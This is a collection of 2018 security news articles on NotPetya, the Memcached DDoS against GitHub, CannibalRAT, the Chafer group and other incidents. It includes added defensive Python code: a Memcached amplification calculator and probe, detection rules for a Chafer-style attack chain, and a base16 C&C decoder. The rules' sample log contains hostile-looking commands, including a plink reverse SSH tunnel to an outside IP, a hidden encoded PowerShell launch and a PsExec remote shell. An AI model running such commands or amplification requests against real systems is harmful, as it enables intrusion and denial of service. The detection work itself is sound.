“The attacks used simplistic malware, but the speed to put the campaign into production indicates that this is a well-organized group, hence it has the traits of a nation state level group,” said Ryan Sherstobitoff, McAfee Senior Analyst of Major Campaigns.

Nuance Estimates NotPetya Impact at $90 Million
3.3.2018 securityweek

Nuance Communications, one of the companies to have been impacted by the destructive NotPetya attack last year, estimates the financial cost of the attack at over $90 million.

Initially believed to be a ransomware outbreak, NotPetya hit organizations worldwide on June 27, and was found within days to be a destructive wiper instead. Linked to the BlackEnergy/KillDisk malware, which has itself been attributed to Russia, NotPetya used a compromised M.E.Doc update server as its initial infection vector.

NotPetya affected major organizations, including Rosneft, AP Moller-Maersk, Merck, FedEx, Mondelez International, Nuance Communications, Reckitt Benckiser, and Saint-Gobain, causing millions in damages to every one of them.

Last year, Nuance estimated that NotPetya reduced its revenue for the third quarter of 2017 by around $15 million, but the company now puts the total financial impact at roughly $92 million.

In its latest 10-Q filing with the Securities and Exchange Commission (SEC), Nuance reveals that, for fiscal year 2017, NotPetya caused a loss of around $68.0 million in revenue, plus incremental costs of approximately $24.0 million as a result of remediation and restoration efforts.

“NotPetya malware affected certain Nuance systems, including systems used by our healthcare customers, primarily for transcription services, as well as systems used by our imaging division to receive and process orders,” Nuance says. The company’s Healthcare segment was hit the most.

The company also notes that, while the direct effects of the attack were remediated during fiscal year 2017, they will continue to affect results in the first quarter of fiscal year 2018 as well. The incident also prompted the company to spend more on improving and upgrading information security during fiscal year 2018 and beyond.

Last month, Danish shipping giant A.P. Moller–Maersk said it had to reinstall software on nearly 50,000 devices following the NotPetya assault. In September 2017, FedEx revealed a negative impact of around $300 million on its profit as result of the attack.

In mid-February 2018, the United Kingdom officially accused the Russian government of being responsible for the NotPetya attack. The next day, the United States, Canada, Australia, and New Zealand joined the U.K. in blaming Russia for the incident.

Biggest-Ever DDoS Attack (1.35 Tbps) Hits GitHub Website
2.3.2018 thehackernews

On Wednesday, February 28, 2018, GitHub's code hosting website was hit with the largest distributed denial of service (DDoS) attack publicly disclosed to date, peaking at a record 1.35 Tbps.
Interestingly, the attackers did not use a botnet; instead they weaponized misconfigured Memcached servers to amplify the attack.
Earlier this week we published a report detailing how attackers could abuse Memcached, a popular, open-source and easily deployed distributed caching system, to launch a DDoS attack more than 51,000 times the size of the traffic they send.
Dubbed Memcrashed, the amplification attack works by sending a forged request to an exposed Memcached server on UDP port 11211 with a source IP address spoofed to match the victim's.
A request of a few bytes causes the vulnerable server to send a response tens of thousands of times larger to the victim's IP address.
"This attack was the largest attack seen to date by Akamai, more than twice the size of the September 2016 attacks that announced the Mirai botnet and possibly the largest DDoS attack publicly disclosed," said Akamai, a cloud computing company that helped GitHub survive the attack.
In a post on its engineering blog, GitHub said, "The attack originated from over a thousand different autonomous systems (ASNs) across tens of thousands of unique endpoints. It was an amplification attack using the memcached-based approach described above that peaked at 1.35Tbps via 126.9 million packets per second."
Expect More Record-Breaking DDoS Attacks
Although amplification attacks are not new, this attack vector relies on thousands of misconfigured Memcached servers, many of which are still exposed to the Internet and could be used to launch even larger attacks against other targets.
To prevent Memcached servers from being abused as reflectors, administrators should firewall, block or rate-limit UDP traffic on port 11211, or disable UDP support entirely if it is not in use (memcached's -U 0 option). Memcached should also be bound to a non-public interface; a cache that is reachable from the Internet at all is misconfigured, whatever the transport. The spoofed source address is what makes the reflection possible, so networks that do not perform source-address validation (BCP 38) contribute to every attack of this kind.
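To see why the attacker needs so little bandwidth, it helps to look at the memcached UDP frame itself. The following added example was written for this page and is not GitHub's, Akamai's or the attackers' code: it builds a "stats" request, parses and reassembles a multi-datagram reply, and computes the amplification factor on a constructed reply. The frame layout follows memcached's protocol.txt; probe_udp() is the only function that touches the network and is intended for checking a server you operate.

```python
"""Memcached UDP framing, amplification arithmetic and an exposure self-test.

Added example written for this page, not GitHub's, Akamai's or the attackers'
code. The 8-byte UDP frame header (request ID, sequence number, number of
datagrams, reserved) follows memcached's protocol.txt. The reply used below is
constructed so the script runs offline; probe_udp() is the only function that
touches the network and is meant to be pointed at a server you operate.
"""
import socket
import struct
from typing import Dict, List

HEADER = struct.Struct("!HHHH")   # request id, sequence no., total datagrams, reserved
MEMCACHED_PORT = 11211


def build_udp_request(command: bytes, request_id: int = 1) -> bytes:
    """Single-datagram request: header followed by one ASCII command line."""
    return HEADER.pack(request_id, 0, 1, 0) + command + b"\r\n"


def parse_udp_frame(datagram: bytes) -> Dict[str, object]:
    """Split one memcached UDP datagram into header fields and payload."""
    if len(datagram) < HEADER.size:
        raise ValueError("datagram shorter than the 8-byte memcached UDP header")
    request_id, seq, total, reserved = HEADER.unpack_from(datagram)
    return {"request_id": request_id, "seq": seq, "total": total,
            "reserved": reserved, "payload": datagram[HEADER.size:]}


def reassemble(datagrams: List[bytes]) -> bytes:
    """Order reply datagrams by sequence number and join their payloads."""
    frames = sorted((parse_udp_frame(d) for d in datagrams), key=lambda f: f["seq"])
    return b"".join(f["payload"] for f in frames)


def amplification_factor(request: bytes, datagrams: List[bytes]) -> float:
    """Bytes delivered to the spoofed victim divided by bytes the attacker sent."""
    return sum(len(d) for d in datagrams) / len(request)


def constructed_reply(request_id: int = 1, count: int = 2, payload_size: int = 1400) -> List[bytes]:
    """Fixture: a multi-datagram 'stats' reply of the shape a server would send (constructed)."""
    line = b"STAT bytes_read 1024\r\n"
    body = (line * (payload_size // len(line) + 1))[:payload_size]
    return [HEADER.pack(request_id, seq, count, 0) + body for seq in range(count)]


def probe_udp(host: str, timeout: float = 2.0) -> bytes:
    """Send 'stats' over UDP to your own server and return the first reply datagram.

    With UDP disabled (memcached -U 0, the default since 1.5.6) nothing comes back and
    socket.timeout is raised; any reply means the port would serve as a reflector if
    it were reachable from the Internet.
    """
    request = build_udp_request(b"stats")
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(request, (host, MEMCACHED_PORT))
        data, _ = sock.recvfrom(65535)
    return data


if __name__ == "__main__":
    request = build_udp_request(b"stats")
    reply = constructed_reply()
    print(f"request {len(request)} bytes, reply {sum(map(len, reply))} bytes, "
          f"amplification x{amplification_factor(request, reply):.1f}")
    print(reassemble(reply)[:44])
```

The constructed reply gives a factor below 200; real attacks reach the tens of thousands reported above by first storing large values with "set" and then requesting them, which is why the fix is to disable UDP or bind to a private interface rather than to rate-limit any one command.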

Windows Updates Deliver Intel's Spectre Microcode Patches
2.3.2018 securityweek 

Microsoft announced on Thursday that Windows users will receive the microcode updates released by Intel to patch the notorious Spectre vulnerability.

Meltdown and Spectre attacks allow malicious applications to bypass memory isolation and access sensitive data. Meltdown attacks are possible due to a flaw tracked as CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be addressed with software updates, but Spectre Variant 2 requires microcode patches.

Microsoft has provided users the necessary software updates and it has now started delivering microcode patches as well.

After the first round of Spectre microcode patches from Intel caused more frequent reboots and other instability problems, the company started releasing new updates. The first patches were for Skylake, then for Kaby Lake and Coffee Lake, and this week for Haswell and Broadwell processors.

Intel has provided the microcode updates to device manufacturers, which are expected to make them available to customers once they have been tested.

For the time being, Microsoft will deliver Intel’s microcode updates to devices with 6th Generation Intel Core (Skylake) processors if they are running Windows 10 version 1709 (Fall Creators Update) or Windows Server version 1709 (Server Core).

“We will offer additional microcode updates from Intel as they become available to Microsoft. We will continue to work with chipset and device makers as they offer more vulnerability mitigations,” said John Cable, director of Program Management, Windows Servicing and Delivery.

When it started releasing software mitigations for Spectre and Meltdown, Microsoft warned that some users may not receive the updates due to antivirus compatibility issues. Cable said the vast majority of Windows devices now have compatible security products installed, so they should not experience any problems getting the patches.

“We will continue to require that an AV compatibility check is made before delivering the latest Windows security updates via Windows Update until we have a sufficient level of AV software compatibility,” Cable explained.

After news broke that Intel’s first round of microcode updates caused instability issues, Microsoft released an update that allowed Windows users to disable the problematic Spectre Variant 2 mitigation.

Cyberattack 'Ongoing' Against German Government Network

2.3.2018 securityweek  BigBrothers

The German government's IT network is under an "ongoing" cyberattack, the parliamentary committee on intelligence affairs said Thursday, without confirming a media report that Russian hackers were behind the assault.

"It is a real cyberattack on parts of the government system. It's an ongoing process, an ongoing attack," said Armin Schuster, chairman of the committee, adding that no further details could be given to avoid passing crucial information on to the attackers.

Interior Minister Thomas de Maiziere said the hacking was "a technically sophisticated attack that had been planned for some time", adding that it had been brought under control.

The highly professional assault had been monitored by the security agencies in order to gain insights into the mode of attack and its targets, said de Maiziere.

German news agency DPA, which first reported the attack the previous day, said Thursday, citing unnamed security sources, that the likely authors were the Russian cyber espionage group "Snake".

DPA had earlier pointed at the Russian hacker group APT28, which has been accused of attacks on Hillary Clinton's 2016 presidential campaign as well as on Germany's parliamentary IT system in 2015.

German security authorities had only detected the online spying in December, DPA has reported, adding that it had infiltrated the systems of the foreign and interior ministries. Konstantin von Notz, deputy of the committee, complained it was "completely unacceptable" that members of the oversight body only learnt of the attack through the media.

- Russian hackers -

Top security officials had repeatedly warned during Germany's 2017 general election campaign that Russian hackers may seek to influence or disrupt the polls.

While authorities did not have concrete proof, they blamed the malware attack that crippled the Bundestag parliamentary network for days in 2015 on APT28, also known as "Fancy Bear" or "Sofacy".

The attack netted 17 gigabytes of data which, officials feared, could be used to blackmail MPs or discredit them.

In a separate assault, several German political parties were in September 2016 sent fake emails purporting to be from NATO headquarters which contained a link that installed spying software on victims' computers.

The emails affected party operations such as a regional network of Chancellor Angela Merkel's Christian Democratic Union and the federal offices of the far-left Die Linke party.

Amid the rising frequency of attacks, Germany's defence ministry in 2016 set up a cyber department to coordinate the response to online intrusions.

Merkel, seeking to prepare the German public for more online attacks, has said people should "not allow themselves to be irritated" by such rogue operations.

Python-Written CannibalRAT Used in Targeted Attacks
2.3.2018 securityweek 

A newly identified remote access Trojan (RAT) that has been written entirely in Python is being used in highly targeted attacks, Cisco Talos researchers say.

Dubbed CannibalRAT, the malware lacks sophistication but exhibits signs of code cannibalization. At least two variants (versions 3.0 and 4.0) have already been used in attacks. Both have the usual RAT capabilities, but the latter was stripped of some features to fit a campaign targeting users of a Brazilian public-sector management school.

The malicious activity associated with the RAT has increased after the second variant (4.0) emerged on February 5, 2018 (the first variant was spotted on Jan. 8). The newer iteration also uses obfuscation to avoid detection: it was packed with UPX and has a function to generate random strings in memory.

Both variants use a base16 encoding scheme to obfuscate command and control (C&C) hostnames and the data exchanged with the server. Both also use the "CurrentVersion\Run" registry key for persistence, under the name "Java_Update", Cisco reveals.

Once executed on the infected machine, version 4.0 creates a PDF file with HTML code embedded, designed to load an image hosted at imgur.com, and launches Chrome to open the PDF.

Both versions connect to the same C&C infrastructure, but the older one uses standard web requests, while the newer version uses a REST-based API. The latter method would send username, hostname, and capability related information to the server as part of the initial request.

The credential-stealer modules are copied from the Radium-Keylogger's source code (available on GitHub), while the VM detection function was copied from a different GitHub repository.

This, the researchers say, shows how much code adversaries share among themselves, which makes attribution even more difficult.

The malware’s modules have self-explanatory names: runcmd, persistence, download, upload, screenshot, miner, DDoS, driverfind, unzip, ehidden, credentials, file, zip, python, update, and vm. All are present in version 3.0, while version 4.0 lacks the distributed denial of service, miner, Python and update modules, as well as the ability to steal credentials from Firefox (it only works with Chrome).

The latest version also drops the module approach and includes all code in the main script. Furthermore, it includes four possible C&C hostnames (version 3.0 only had two), and randomly chooses one upon execution.

The attackers use the fast flux technique to hide the infrastructure and change name servers with high frequency (120 seconds), but the end points tend to be the same, belonging to a telecom provider in Brazil, the researchers say.

One of the domains associated with the campaign (the malware was hosted on it) is inesapconcurso.webredirect.org, apparently specifically created for these attacks. The actor used social engineering for the name as well: inesapconcurso is the aggregation of inesap and concurso, representing the school name and the Portuguese word for “competition”.

“While the objective of this campaign is unclear, the adversaries went through some work in order to keep their RAT as unnoticed as possible. Both the campaign target and the command-and-control visibility show this campaign is active in Brazil, which our DNS data confirms, reflecting the highly targeted approach of this campaign,” Cisco concludes.

Philips Working on Patches for 35 Flaws in Healthcare Product
2.3.2018 securityweek 

Philips has informed customers that it’s working on patches for dozens of vulnerabilities affecting the company’s IntelliSpace Portal, a visualization and analysis solution designed for healthcare organizations.

According to Philips, versions 7.0.x and 8.0.x of the IntelliSpace Portal are affected by issues related to insecure Windows service permissions, legacy encryption, and remote desktop access functionality. A total of 35 CVE identifiers are associated with the vulnerabilities.

An advisory published by ICS-CERT describes the security holes as input validation flaws that allow remote code execution or denial-of-service (DoS) attacks, information exposure issues that allow unauthorized access to sensitive data, access control weaknesses that can be used for privilege escalation or code execution, local code execution and privilege escalation flaws, a code execution vulnerability that exists due to leftover debugging code, and multiple cryptographic issues.

While some of these vulnerabilities appear to be specific to Philips’ product, many affect third-party components. For example, there are several remote code execution, information disclosure and DoS flaws related to Windows SMB, including the EternalBlue flaw exploited in the WannaCry ransomware attack.

Other flaws affect the Microsoft Remote Desktop Protocol (RDP) and Microsoft Office. The crypto-related weaknesses include POODLE, BEAST and other vulnerabilities disclosed in the past years, including one from 2004.

While exploits are publicly available for many of these vulnerabilities, they don’t specifically target Philips products, and the vendor claims it’s not aware of any attacks.

Philips will release patches in the coming months. The company says it’s also currently testing operating system updates, which cannot be installed without ensuring that they don’t impact the stability of the product. Until patches become available, customers have been provided a series of workarounds.

In January, Philips informed customers of an authentication issue affecting its IntelliSpace Cardiovascular (ISCV) cardiac image and information management system.

The company learned from a customer that when the ISCV system is used with an Electronic Medical Record (EMR) in Kiosk mode and configured with Windows authentication, users may not be properly logged out once they are done using the software.

The flaw allows a malicious actor that gains access to the system after it has been used by a legitimate EMR user to log in with that user’s credentials and obtain or modify sensitive information.

Philips said the security hole will be addressed with the release of version 3.1.0. In the meantime, users have been advised to close the browser after accessing the system. Changing the configuration so that Windows authentication is not used also addresses the problem.

Iran-Linked Chafer Group Expands Toolset, Targets List
2.3.2018 securityweek  APT
The Iran-based targeted attack group known as "Chafer" has been expanding its target list in the Middle East and beyond and adding new tools to its cyberweapon arsenal, Symantec warns.

Last year, the group engaged in a series of ambitious new attacks, hitting a major telecoms services provider in the Middle East and also attempting to attack a major international travel reservations firm. Active since at least July 2014 and first detailed a couple of years ago, Chafer is mainly focused on surveillance operations and the tracking of individuals.

During 2017, the group used seven new tools, rolled out new infrastructure, and hit nine new organizations in Israel, Jordan, the United Arab Emirates, Saudi Arabia, and Turkey. Targets included airlines, aircraft services, software and IT services firms serving the air and sea transport sectors, telecoms, payroll services, engineering consultancies, and document management software companies.

The group also targeted an African airline and attempted to compromise an international travel reservations firm, Symantec discovered.

Last year, Chafer compromised a telecoms services provider in the Middle East, a company that sells solutions to multiple telecom operators in the region. The compromise could have potentially allowed the attackers to carry out surveillance on a vast pool of end-users.

In attacks observed in 2015, the group compromised organizations' web servers, likely through SQL injection. Last year, the group also started using malicious documents to drop malware, likely sent via spear-phishing emails to individuals working at targeted organizations.

These documents were Excel spreadsheets carrying a malicious VBS file that runs a PowerShell script to execute a dropper on the compromised machine. In turn, the dropper installs an information stealer, a screen capture utility, and an empty executable.

The screen capture tool only played a role in the initial information-gathering stage, while the information stealer captured the contents of the clipboard, took screenshots, recorded keystrokes, and stole files and user credentials. Next, the attackers downloaded additional tools onto the infected computer and attempted lateral movement across the victim's network.

Recently, Chafer employed seven new tools in addition to the malware already associated with the group. Most of these tools, Symantec points out, are freely available, off-the-shelf tools that have been put to a malicious use.

These include Remcom, an open-source alternative to PsExec; Non-sucking Service Manager (NSSM), an open-source alternative to the Windows Service Manager; a custom screenshot and clipboard capture tool; SMB hacking tools, including the EternalBlue exploit; GNU HTTPTunnel, an open-source tool to create a bidirectional HTTP tunnel on Linux computers; UltraVNC, an open-source remote administration tool for Windows; and NBTScan, a free tool for scanning IP networks for NetBIOS name information.

Additionally, the group continued to use tools such as its own custom backdoor Remexi, PsExec, Mimikatz, Pwdump, and Plink.

Chafer apparently used the tools in concert to traverse targeted networks. NSSM was recently adopted for persistence, installing a service that runs Plink, which opens a reverse SSH tunnel, presumably to give the attackers RDP access to the compromised computer. Next, PsExec, Remcom, and the SMB hacking tools are leveraged for lateral movement.
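The tool chain above (Excel document, VBS, PowerShell dropper, an NSSM-installed service running Plink, PsExec or Remcom for lateral movement) is made of ordinary, legitimately available binaries, so detection has to key on parent/child relationships and command lines rather than on file hashes. The following hunting rules are an added example written for this page, not Symantec's or Chafer's code. They run over constructed process-creation events in a made-up key=value line format that stands in for Sysmon Event ID 1 or EDR telemetry; the host names, paths, service name and the 203.0.113.10 address are all constructed.

```python
"""Hunting rules for the Chafer tool chain over constructed process-creation events.

Added example written for this page, not Symantec's or Chafer's code. Events
are dicts with the fields a Sysmon Event ID 1 or EDR process-creation record
carries (parent image, image, command line). The key=value event format, the
host names, paths and the 203.0.113.10 address are constructed for the example.
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "mshta.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_script_host(ev: Event) -> bool:
    """Excel (or Word) starting a script host: the document-dropper step."""
    return basename(ev["parent_image"]) in OFFICE_APPS and basename(ev["image"]) in SCRIPT_HOSTS


def script_host_spawns_powershell(ev: Event) -> bool:
    """The VBS handing off to PowerShell, the next link in the same chain."""
    return (basename(ev["parent_image"]) in {"wscript.exe", "cscript.exe"}
            and basename(ev["image"]) == "powershell.exe")


def plink_reverse_tunnel(ev: Event) -> bool:
    """plink.exe opening a reverse SSH tunnel (-R) to an outside host."""
    return (basename(ev["image"]) == "plink.exe"
            and re.search(r"(^|\s)-R\b", ev["command_line"]) is not None)


def nssm_wraps_plink(ev: Event) -> bool:
    """NSSM installing a service whose binary is plink: persistence for the tunnel."""
    cmd = ev["command_line"].lower()
    return basename(ev["image"]) == "nssm.exe" and " install " in cmd and "plink" in cmd


def remote_exec_tool(ev: Event) -> bool:
    """PsExec or Remcom aimed at a remote host (\\\\host argument): lateral movement."""
    return basename(ev["image"]) in {"psexec.exe", "remcom.exe"} and "\\\\" in ev["command_line"]


RULES: Dict[str, Callable[[Event], bool]] = {
    "office_spawns_script_host": office_spawns_script_host,
    "script_host_spawns_powershell": script_host_spawns_powershell,
    "plink_reverse_tunnel": plink_reverse_tunnel,
    "nssm_wraps_plink": nssm_wraps_plink,
    "remote_exec_tool": remote_exec_tool,
}


def parse_line(line: str) -> Event:
    """Parse the constructed 'key=value;key=value' event line used in this example."""
    fields = dict(part.split("=", 1) for part in line.strip().split(";") if "=" in part)
    for key in ("parent_image", "image", "command_line"):
        fields.setdefault(key, "")
    return fields


def hunt(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (host, rule name, command line) for every event that matches a rule."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((ev.get("host", "?"), name, ev["command_line"]))
    return hits


# Constructed sample events, not real telemetry.
SAMPLE_LOG = [
    "host=WS01;parent_image=C:\\Program Files\\Microsoft Office\\EXCEL.EXE;"
    "image=C:\\Windows\\System32\\wscript.exe;command_line=wscript.exe C:\\Users\\a\\AppData\\Local\\Temp\\inv.vbs",
    "host=WS01;parent_image=C:\\Windows\\System32\\wscript.exe;"
    "image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe;command_line=powershell.exe -nop -w hidden -enc AAAA",
    "host=WS01;parent_image=C:\\Windows\\System32\\cmd.exe;"
    "image=C:\\ProgramData\\nssm.exe;command_line=nssm.exe install WinUpdateSvc C:\\ProgramData\\plink.exe",
    "host=WS01;parent_image=C:\\ProgramData\\nssm.exe;"
    "image=C:\\ProgramData\\plink.exe;command_line=plink.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.10 -pw x",
    "host=WS01;parent_image=C:\\Windows\\System32\\cmd.exe;"
    "image=C:\\Tools\\PsExec.exe;command_line=PsExec.exe \\\\FS01 -s cmd.exe",
    "host=WS02;parent_image=C:\\Windows\\explorer.exe;"
    "image=C:\\Windows\\System32\\notepad.exe;command_line=notepad.exe notes.txt",
]

if __name__ == "__main__":
    for host, rule, cmd in hunt(SAMPLE_LOG):
        print(f"{host}: {rule}: {cmd}")
```

Each rule alone will fire on administrators too (PsExec and NSSM are admin tools); the value is in correlating several of them on one host within a short window, which is what the sample log shows for WS01.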

The new infrastructure used in recent attacks included the domain win7-updates[.]com as a command and control (C&C) address, along with multiple IP addresses, though it’s unclear whether these were leased or hijacked. On a staging server apparently used by the attackers, the researchers found copies of many of the group’s tools.

According to Symantec, Chafer's activities have some links to Oilrig, another Iran-based cyberespionage group. Both appear to use the same IP address for C&C, as well as a similar infection vector: an Excel document dropping a malicious VBS file that references the same misspelled file path.

While this could suggest that the two groups are one and the same, there isn’t enough evidence to support that hypothesis, Symantec says. More likely, the “two groups are known to each other and enjoy access to a shared pool of resources,” the researchers suggest.

Chafer’s recent activities show not only that the group remains highly active, but also that it has become more audacious in its choice of targets. Similar to other targeted attack groups, it has been relying on freely available software tools for malicious activities, and also moved to supply chain attacks, which are more time consuming and more likely to be discovered.

“These attacks are riskier but come with a potentially higher reward and, if successful, could give the attackers access to a vast pool of potential targets,” Symantec concludes.

Equifax Identifies 2.4 Million More Affected by Massive Hack
2.3.2018 securityweek  Hacking

US credit bureau Equifax said Thursday it identified an additional 2.4 million American consumers affected by last year's massive data breach that sparked a public outcry and a congressional probe.

The company's forensic investigation revealed the new identities on top of the 146 million affected in the attack that exposed victims' personal details, including names, birth dates and social security numbers.

"This is not about newly discovered stolen data," said Paulino do Rego Barros, who took over as interim chief executive last year at the scandal-hit credit agency.

"It's about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals."

Equifax said the newly identified consumers were not previously informed because their social security numbers -- which appeared to be the focus of the hackers -- were not stolen together with their partial driver's license information.

Equifax said it would notify these consumers and will offer identity theft protection and credit file monitoring services.

The Atlanta-based company, which tracks consumer financial data to help establish credit ratings, is now facing state and federal investigations as well as class-action lawsuits over the breach.

While the breach was not the largest in history, it has been considered among the most damaging because of the sensitive information held by Equifax and the potential for that data to be used in identity theft or other crimes.

CannibalRAT, a RAT entirely written in Python observed in targeted attacks
2.3.2018 securityaffairs

Security researchers from Cisco Talos discovered a new remote access Trojan (RAT) dubbed CannibalRAT that has been written entirely in Python.
CannibalRAT is being used in highly targeted attacks. The experts explained that, while it is not very sophisticated, it exhibits signs of code cannibalisation from other open-source projects.

“The RAT itself is not very sophisticated, and exhibits signs of code cannibalisation from other open-source projects, which contrasts with the command-and-control, using fast flux to keep hidden, even if the endpoints are not very diversified.” reads the analysis published by Talos.

The researchers observed the involvement of at least two variants (versions 3.0 and 4.0) in targeted attacks.


The two samples were written using Python and packed into an executable using the popular tool py2exe.

According to the researchers, version 4.0 is a stripped-down version: the authors removed some features from the main code, but at the same time added obfuscation techniques to avoid detection.

The version 4.0 includes a function that will generate random strings in memory in the attempt to make memory string analysis harder.
“The malware main script bytecode is stored in a portable executable (PE) section called PYTHONSCRIPT, while the Python DLL is stored in a section called PYTHON27.DLL. All the remaining modules’ bytecode is compressed and stored in the executable overlay.” continues the analysis.

The first variant of the malware was spotted on Jan. 8, but Cisco Talos observed a significant increase in CannibalRAT activity after variant 4.0 appeared in the wild on February 5, 2018.

Both variants use a base16 encoding scheme to obfuscate command and control (C&C) hostnames and the data exchanged with the server, and both gain persistence through the "CurrentVersion\Run" registry key, using the name "Java_Update".
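Both write-ups of CannibalRAT on this page (the SecurityWeek article above and this one) give the same two host-side indicators: C&C hostnames hidden behind base16 encoding, and a "Java_Update" entry under the CurrentVersion\Run key. The following added example, written for this page and not Talos's or the malware's code, shows how each is recovered: it carves base16 runs out of a constructed sample and keeps the ones that decode to DNS names, and it parses a constructed .reg export of the Run key and flags the suspicious entry. The hostnames use the reserved .invalid TLD rather than the real campaign domains, and the registry export is invented.

```python
"""Recover CannibalRAT-style indicators: base16-encoded C&C names and the Run-key entry.

Added example written for this page, not Talos's or the malware's code.
Python's base64.b16encode is the obvious way a Python RAT would produce
base16 strings. The 'sample' and the .reg export below are constructed; the
hostnames use the reserved .invalid TLD instead of the real campaign domains.
"""
import base64
import re
from typing import Dict, List, Tuple

# Runs of hex digits long enough to hold a hostname; upper-case, as b16encode emits.
HEX_RUN = re.compile(rb"[0-9A-F]{16,}")
HOSTNAME = re.compile(rb"^(?=.{1,253}$)([a-z0-9-]{1,63}\.)+[a-z]{2,63}$")
RUN_KEY = r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]"


def obfuscate(value: str) -> bytes:
    """What the RAT does to a string before embedding it: base16 of the UTF-8 bytes."""
    return base64.b16encode(value.encode())


def carve_base16(blob: bytes) -> List[Tuple[int, bytes]]:
    """Find hex runs in a sample, decode each, return (offset, decoded bytes) pairs."""
    out = []
    for m in HEX_RUN.finditer(blob):
        run = m.group(0)
        if len(run) % 2:            # base16 output always has an even digit count
            run = run[:-1]
        out.append((m.start(), base64.b16decode(run)))
    return out


def recover_hostnames(blob: bytes) -> List[str]:
    """Keep only decoded strings that look like DNS names: the C&C candidates."""
    hosts = {d.decode().lower() for _, d in carve_base16(blob) if HOSTNAME.match(d.lower())}
    return sorted(hosts)


def build_sample() -> bytes:
    """Constructed 'script': obfuscated hostnames, one non-hostname string and hex noise."""
    hosts = ["cc1.example.invalid", "cc2.example.invalid", "update.example.invalid"]
    return b"".join([
        b"import random\nhosts = [",
        b", ".join(b"'" + obfuscate(h) + b"'" for h in hosts),
        b"]\nfunc = '" + obfuscate("persistence") + b"'\n",
        b"crc = 'DEADBEEFCAFEBABE'\n",          # hex that is not base16 text
    ])


def run_key_values(reg_export: str) -> Dict[str, str]:
    """Parse a .reg export and return name -> command for entries under the user's Run key."""
    values: Dict[str, str] = {}
    inside = False
    for line in reg_export.splitlines():
        if line.startswith("["):
            inside = line.strip().lower() == RUN_KEY.lower()
            continue
        if inside and line.startswith('"') and "=" in line:
            name, _, data = line.partition("=")
            values[name.strip('"')] = data.strip().strip('"')
    return values


def suspicious_run_entries(values: Dict[str, str]) -> List[str]:
    """Flag the campaign's 'Java_Update' name or a binary launched from the roaming profile."""
    flagged = []
    for name, command in values.items():
        path = command.lower().replace("\\\\", "\\")   # undo .reg backslash escaping
        if name.lower() == "java_update" or "\\appdata\\roaming\\" in path:
            flagged.append(name)
    return flagged


# Constructed .reg export of the user's Run key (not from a real infection).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="C:\\Users\\a\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"
"Java_Update"="C:\\Users\\a\\AppData\\Roaming\\java_update.exe"
'''

if __name__ == "__main__":
    print("C&C candidates:", recover_hostnames(build_sample()))
    print("suspicious Run entries:", suspicious_run_entries(run_key_values(SAMPLE_REG)))
```

Because the 4.0 sample is UPX-packed and keeps its bytecode in a PYTHONSCRIPT section, carve_base16() is meant to run on the unpacked script or on a process memory dump rather than on the packed file; the randomly generated in-memory strings mentioned above do not decode to hostnames and fall out at the HOSTNAME filter.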

Once executed, the CannibalRAT version 4.0 creates a PDF file with HTML code embedded that loads an image hosted at imgur.com and launches Chrome to open the PDF.

The two versions share the same C&C servers, but while the variant 3.0 uses standard web requests, the newer version uses a REST-based API.

“The command-and-control infrastructure attempts to use the fast flux technique to hide, although the name servers are changing with high frequency, and the end points tend to be the same, all belonging to a telecom provider in Brazil with the autonomous system number AS 7738 and shared among all four command-and-control hostnames.” states Cisco Talos.

CannibalRAT borrows its credential-stealer modules from the Radium-Keylogger, whose source code is published on GitHub; the experts also noticed that the VM detection feature was copied from a different GitHub repository.

“The malware’s modules have self-explanatory names: runcmd, persistence, download, upload, screenshot, miner, DDoS, driverfind, unzip, ehidden, credentials, file, zip, python, update, and vm.” continues the analysis.”All are present in version 3.0, while version 4.0 lacks the distributed denial of service, miner, Python and update modules, as well as the ability to steal credentials from Firefox (it only works with Chrome).”

The experts noticed that version 4.0 does not use modules; instead, all the code is included in the main script.

The Talos team provided details of a campaign involving CannibalRAT that targeted INESAP, a Brazilian school for public administration.

The campaign is highly targeted at this specific geographic region, and the attackers went after Chrome users only.

“the RAT was hosted at inesapconcurso.webredirect.org and filebin.net, while the second domain is a popular file-sharing platform, the first domain was clearly created as part of the campaign.” continues the analysis.

“The subdomain inesapconcurso is the aggregation of two words; inesap and concurso. The first word is the school name, the second can be translated into competition, this is part of the social engineering of this campaign, as this Institute helps the management the application of workers to public sector vacancies.”
Further info about the malware including IoCs are reported in the analysis.

European Commission requests IT firms to remove ‘Terror Content’ within an hour
2.3.2018 securityaffairs Cyber

The EU issued new recommendations to tackle illegal content online, asking internet companies to remove terror content from their platforms within an hour of notification.
The recommendations, issued on Thursday, cover "harmful content" in general, with terror content as the most urgent case.

“As a follow-up, the Commission is today recommending a set of operational measures accompanied by the necessary safeguards – to be taken by companies and Member States to further step up this work before it determines whether it will be necessary to propose legislation.” reads the fact sheet published by the European Commission.

“These recommendations apply to all forms of illegal content ranging from terrorist content, incitement to hatred and violence, child sexual abuse material, counterfeit products and copyright infringement.”

It is a call to action for the tech firms and social media giants to take down “terrorist content” within an hour of it being reported, the recommendation is directed to major services including YouTube, Facebook, and Twitter.

These platforms are abused daily by terrorist organizations such as the Islamic State group. The EU's recommendations follow the demands of the nations that took part in the 2017 G7 Summit in Taormina, Italy, which urged action from internet service providers and social media giants against extremist content online.


The European Commission is teaming up with a group of US internet giants to adopt additional measures against web extremism, but at the same time it warned that it would consider legislation if the internet firms do not follow the recommendations.

